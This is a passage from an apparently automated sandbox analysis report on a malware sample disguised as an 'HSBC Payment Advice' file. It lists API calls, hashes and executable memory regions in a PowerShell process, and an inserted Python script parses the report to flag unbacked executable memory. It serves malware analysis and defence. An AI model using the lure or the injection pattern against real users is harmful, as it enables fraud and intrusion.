          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CharPrevlstrcatlstrlen
          • String ID: C:\Users\user\AppData\Local\Temp\
          • API String ID: 2659869361-3355392842
          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
          • Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
          • Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE
          APIs
          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
          • String ID:
          • API String ID: 1404258612-0
          • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
          • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
          • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
          • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
          APIs
          • IsWindowVisible.USER32(?), ref: 00405135
          • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
            • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Window$CallMessageProcSendVisible
          • String ID:
          • API String ID: 3748168415-3916222277
          • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
          • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
          • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
          • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
          APIs
          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76702EE0,004037F4,76703420,0040361F,?), ref: 00403837
          • GlobalFree.KERNEL32(?), ref: 0040383E
          Strings
          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Free$GlobalLibrary
          • String ID: C:\Users\user\AppData\Local\Temp\
          • API String ID: 1100898210-3355392842
          • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
          • Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
          • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
          • Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED
          APIs
          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405985
          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405995
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CharPrevlstrlen
          • String ID: C:\Users\user\Desktop
          • API String ID: 2709904686-3370423016
          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
          • Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
          • Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9
          APIs
          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
          • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
          • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
          • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: lstrlen$CharNextlstrcmpi
          • String ID:
          • API String ID: 190613189-0
          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
          • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
          • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9
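The function records above pair each carved function with the Win32 APIs it calls and with the memory dump it was carved from, and the records that follow come from executable, writable, non-PE regions of the powershell.exe process. The script below is an added example, not part of the Joe Sandbox report or of its IDA plugin: it parses those two kinds of line, decodes the dump file name, and flags executable regions that are not backed by a loaded image. The field layout of the .sdmp name (process index, phase, dump id, base address, page protection, an undecoded field, memory type, an undecoded field) is an assumption inferred from the values in this report; the protection and type values it decodes agree with the winnt.h PAGE_* and MEM_* constants, which are certain. The sample lines are copied from this report, and the names Region, ApiCall, parse_report, suspicious_regions and parse_api_calls are this example's own.

```python
"""Triage helpers for the "APIs" and "Memory Dump Source" lines of a Joe Sandbox
function listing (added example, not part of the report or of its IDA plugin).
ASSUMPTION: a .sdmp name is read as
  <proc index>.<phase>.<dump id>.<base>.<protection>.<undecoded>.<type>.<undecoded>.sdmp
inferred from the values in this report; protection and type match winnt.h constants."""
import re
from dataclasses import dataclass

PAGE_NAMES = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
              0x40: "PAGE_EXECUTE_READWRITE"}                       # winnt.h, certain
MEM_TYPE_NAMES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80                               # any PAGE_EXECUTE* value
HEX8 = r"[0-9A-Fa-f]{8}"
SDMP_RE = re.compile(rf"(?P<proc>{HEX8})\.{HEX8}\.\d+\.(?P<base>[0-9A-Fa-f]{{16}})\."
                     rf"(?P<protect>{HEX8})\.{HEX8}\.(?P<type>{HEX8})\.{HEX8}\.sdmp")
SOURCE_RE = re.compile(r"Source File: (?P<name>\S+?\.sdmp), .*based on PE: (?P<pe>true|false)")
ASSOC_RE = re.compile(r"Associated: (?P<name>\S+?\.sdmp)")   # tolerates "...sdmpDownload File"
API_RE = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")

@dataclass(frozen=True)
class Region:
    process_index: int
    base: int
    protect: int
    mem_type: int
    based_on_pe: "bool | None"     # None for "Associated" lines, which carry no PE flag

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def image_backed(self) -> bool:
        return self.mem_type == 0x1000000

def parse_dump_name(name: str):
    """Return (process index, base address, protection, memory type) from a .sdmp name."""
    m = SDMP_RE.fullmatch(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return int(m["proc"], 16), int(m["base"], 16), int(m["protect"], 16), int(m["type"], 16)

def parse_report(text: str) -> list:
    """Distinct dump regions named in the listing.  The same dump is repeated under every
    function carved from it, so entries are keyed by file name; a "Source File" entry
    (which carries the PE flag) wins over an "Associated" entry for the same dump."""
    regions = {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line.startswith("Source File:"):
            m = SOURCE_RE.match(line)
            pe = m["pe"] == "true" if m else None
        elif line.startswith("Associated:"):
            m, pe = ASSOC_RE.match(line), None
        else:
            continue
        if not m or (pe is None and m["name"] in regions):
            continue
        regions[m["name"]] = Region(*parse_dump_name(m["name"]), pe)
    return list(regions.values())

def suspicious_regions(regions) -> list:
    """Executable memory not backed by a loaded image: where unpacked or dynamically
    generated code lands.  Caveat: JIT-compiled .NET code in powershell.exe lives in the
    same kind of region, so hits are candidates to cross-check against the dumped bytes
    and the sandbox's memory signatures, not verdicts."""
    return [r for r in regions if r.executable and not r.image_backed]

def describe(r: Region) -> str:
    pe = "?" if r.based_on_pe is None else str(r.based_on_pe)
    return (f"proc#{r.process_index} base=0x{r.base:08X} {PAGE_NAMES.get(r.protect, hex(r.protect))} "
            f"{MEM_TYPE_NAMES.get(r.mem_type, hex(r.mem_type))} pe={pe}")

@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    ref: int
    strings: tuple      # argument tokens that are neither '?' nor bare 8-digit hex values

def parse_api_calls(text: str) -> list:
    calls = []
    for raw in text.splitlines():
        m = API_RE.match(raw.strip().lstrip("•").strip())
        if m:
            toks = [t for t in m["args"].split(",") if t and t != "?" and not re.fullmatch(HEX8, t)]
            calls.append(ApiCall(m["api"], m["module"], int(m["ref"], 16), tuple(dict.fromkeys(toks))))
    return calls

# Sample input: lines copied from this report (the "Download File" suffix is page residue).
REPORT_EXCERPT = r"""
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDF
• RegCloseKey.ADVAPI32(?,?,00406028,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405E23
• Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
• Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
• Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
"""
```

Feed `parse_report` and `parse_api_calls` the saved report text and print `describe()` for each hit of `suspicious_regions`. On the excerpt above the three regions of the HSBC Payment Advice.exe image decode as MEM_IMAGE and are dropped, while the two powershell.exe regions at 0x04640000 and 0x075E0000 decode as PAGE_EXECUTE_READWRITE MEM_PRIVATE with no PE header and are returned; the API parser lifts the registry path and the ": Completed" string out of the argument columns so the function can be labelled without reading the hex.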
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0067d97a36647da19639afc8d5bebd8038131c3e62933a9ee56d916bb5a55f45
          • Instruction ID: ec44a9b076b5f65d32047b65ffc5eb23dc0734c49beef7a1748df6aab2e07d7a
          • Opcode Fuzzy Hash: 0067d97a36647da19639afc8d5bebd8038131c3e62933a9ee56d916bb5a55f45
          • Instruction Fuzzy Hash: D3525A74B40219EBDF25CFA4D4947AEBBB2AFC9304F104199D406AB351EB34AD86CF91
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c5a7d727252de47f321065db2191f607c74dbed9cf58e197b4f158c7100fa98e
          • Instruction ID: dc22b136518bca1e1e2c3cf7a29bf0402a005fdcb3a927b125b45d87a7ece5e2
          • Opcode Fuzzy Hash: c5a7d727252de47f321065db2191f607c74dbed9cf58e197b4f158c7100fa98e
          • Instruction Fuzzy Hash: D3911C71F106145BEF19DFB998109AEBBE3AFC4710B00891DD016AB340DF79AA058BD6
          Memory Dump Source
          • Source File: 00000002.00000002.91916325160.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_4640000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6f376b7fec58dedf9e32170c2f51f4a4e590d1f218b155ad370d60c47fc730e9
          • Instruction ID: 27766aa525e47aa5697af35ea2aa78b434e94d5d2d310f95381526c5d0252f7b
          • Opcode Fuzzy Hash: 6f376b7fec58dedf9e32170c2f51f4a4e590d1f218b155ad370d60c47fc730e9
          • Instruction Fuzzy Hash: 25911D71F106645BEF19DFB998109AEBBF3AFC4710B00891DD016AB340DF79AA058BD6
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: Cm$ Cm$(.5l$4[Dm$4[Dm$4[Dm$4[Dm$4[Dm$4[Dm$4\Dm$4\Dm$4\Dm$4\Dm$@bDm$@bDm$@bDm$@bDm$\}?m$\}?m$GDm$GDm
          • API String ID: 0-3543860342
          • Opcode ID: 9c1aa06b10e909df7e8c8dfaeadff133b831548595eaa8435110f4a625e1c17e
          • Instruction ID: 3714009bb99d302cba05fc3b635beeed3552dc2787899e21d039f6bb1218909f
          • Opcode Fuzzy Hash: 9c1aa06b10e909df7e8c8dfaeadff133b831548595eaa8435110f4a625e1c17e
          • Instruction Fuzzy Hash: A68290B4B002559FEB18CB65C945BAABBB2FF85300F14C0AAD9099F355CB71DD82CB91
          Memory Dump Source
          • Source File: 00000002.00000002.91928051440.0000000008E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E00000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_8e00000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: Cm$ Cm$(.5l$4\Dm$4\Dm$4\Dm$4\Dm$@bDm$@bDm$GDm$GDm$GDm$GDm
          • API String ID: 0-512841179
          • Opcode ID: 579752ca8c292155755dadd64263cf54227ba8986cbeb2619b3ee91dfb135930
          • Instruction ID: ddc403a42d10cb2088ada3c3a48b605c13cb2992de39d3cb0d9298f2aa5c6949
          • Opcode Fuzzy Hash: 579752ca8c292155755dadd64263cf54227ba8986cbeb2619b3ee91dfb135930
          • Instruction Fuzzy Hash: 62928076B00244DFEB14CBA8C450BAAB7B2AF89316F14D46AD8059F395CB71DC82CF91
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: 4[Dm$4[Dm$4[Dm$4[Dm$4[Dm$4[Dm$4[Dm$4[Dm$4\Dm$4\Dm$@bDm$@bDm
          • API String ID: 0-2443436435
          • Opcode ID: 93679f834f8935504f4ea8a7afe3c0ef3e6daf4958853b93d931ba60b87a71e2
          • Instruction ID: ef9bfa1be6722ea68b8432e87be59cca0ce3b29bbf5d8b82656d0345f283d935
          • Opcode Fuzzy Hash: 93679f834f8935504f4ea8a7afe3c0ef3e6daf4958853b93d931ba60b87a71e2
          • Instruction Fuzzy Hash: 7BE1BBB4B01285DBEB08DFA4C445BAEB7B6AF88704F50C46AE5056F355CB71EC82CB91
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: Cm$ Cm$$rDm$$rDm$GDm$GDm$GDm$GDm$GDm$GDm
          • API String ID: 0-911605312
          • Opcode ID: 0c2b1aae45742936a1865dbc4c3be9fee1585a4783265de079ffef53705682c6
          • Instruction ID: 3832987a87dfd2126353cd8bd7c96f22f0f29a2b740860b502cd893a176dbcca
          • Opcode Fuzzy Hash: 0c2b1aae45742936a1865dbc4c3be9fee1585a4783265de079ffef53705682c6
          • Instruction Fuzzy Hash: CB123AB5B043528FDB199B6994007EBBBAAAFC6210F14C46BD505CF251DB71EC42C792
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: Cm$ Cm$4[Dm$4[Dm$4[Dm$4[Dm$4\Dm$4\Dm$@bDm$@bDm
          • API String ID: 0-3276008725
          • Opcode ID: b89a8b9fdfee08de11dd8c1b5d71106615c9dc0cb8af33a75e334efa7cdd5537
          • Instruction ID: 950e7cf546b29488d80de81e20136ba4cc672457442207e419aa61c3df7dfbd8
          • Opcode Fuzzy Hash: b89a8b9fdfee08de11dd8c1b5d71106615c9dc0cb8af33a75e334efa7cdd5537
          • Instruction Fuzzy Hash: 3AE13DB4B003159FEB68CB64C945BAAB7B6BF85300F1081A9D5496F346CB71ED81CF91
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: Cm$ Cm$(.5l$4\Dm$4\Dm$@bDm$@bDm
          • API String ID: 0-498408054
          • Opcode ID: d322133ca205503d58b523b89b58ebbccae904af5451762d2de9afe551614f1d
          • Instruction ID: 19a8be20b6e7b6cdcabee8e734bb6c50b586687b79718c2549d1af2a48ed984c
          • Opcode Fuzzy Hash: d322133ca205503d58b523b89b58ebbccae904af5451762d2de9afe551614f1d
          • Instruction Fuzzy Hash: B4A29FB4B00215DFE718CB65C945BAEB7B2BB89314F208569D505AF346CBB2EC92CF41
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: 4[Dm$4[Dm$4[Dm$\}?m$\}?m$\}?m$\}?m
          • API String ID: 0-2740048210
          • Opcode ID: 2efd52fc6549c9ae728f5e04e2646e146e1301d1252cdca3e71cf7b2050e603c
          • Instruction ID: dd13317c77147b7cf8a82069951291c526f00130422d9036c1cdd2d20cabc781
          • Opcode Fuzzy Hash: 2efd52fc6549c9ae728f5e04e2646e146e1301d1252cdca3e71cf7b2050e603c
          • Instruction Fuzzy Hash: A1522DB4B012559FEB54CB64C945FA9B7B2BF84304F10C0A9E9099F356CA72ED82CF91
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: 4[Dm$4[Dm$4[Dm$\}?m$\}?m$\}?m
          • API String ID: 0-2484994598
          • Opcode ID: 132c902850f53921c758c5b9eddb1d42a22d7fde7553f4360a91449ac8826681
          • Instruction ID: 9e56ec6a46d7ccb98379d7e24b923c88682cc4737819dff39036284781a57ba5
          • Opcode Fuzzy Hash: 132c902850f53921c758c5b9eddb1d42a22d7fde7553f4360a91449ac8826681
          • Instruction Fuzzy Hash: 7B422CB8B002159FE714CB64CD51FAAB7B2EF89704F1084A5D9096F395CA72ED82CF91
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: (.5l$4[Dm$4[Dm$4[Dm$\}?m$\}?m
          • API String ID: 0-2633097208
          • Opcode ID: d8d58670fe8843d0c9e381dfe00c1b453992527eccb540e97f3ef9e1dc0039c0
          • Instruction ID: 0cd38556a14bef705a3000ace7829bd566a5ae6165815f3d2a7f458072804942
          • Opcode Fuzzy Hash: d8d58670fe8843d0c9e381dfe00c1b453992527eccb540e97f3ef9e1dc0039c0
          • Instruction Fuzzy Hash: B32239B4B012149FE714DB64C955FAAB7B2EF89704F1084A9D9096F395CB72EC82CF90
          Memory Dump Source
          • Source File: 00000002.00000002.91923702286.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_75e0000_powershell.jbxd
          Similarity
          • API ID:
          • String ID: 4[Dm$4[Dm$4[Dm$4[Dm$4\Dm$@bDm
